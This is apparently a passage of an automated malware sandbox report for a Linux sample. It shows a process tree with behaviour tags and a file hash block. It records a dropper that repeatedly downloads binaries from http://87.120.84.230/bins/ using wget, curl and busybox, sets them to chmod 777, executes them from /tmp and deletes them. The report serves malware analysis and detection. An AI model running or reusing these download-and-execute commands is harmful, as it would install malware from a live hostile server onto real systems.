/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:943
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:945
-
-
/bin/chmodchmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:948
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:949
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:951
-
-
/bin/chmodchmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:954
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:955
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:957
-
-
/bin/chmodchmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:960
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:961
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:963
-
-
/bin/chmodchmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:966
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:967
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:969
-
-
/bin/chmodchmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:972
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:973
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:975
-
-
/bin/chmodchmod 777 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c./mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:978
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:979
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:981
-
-
/bin/chmodchmod 777 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk./HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:984
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97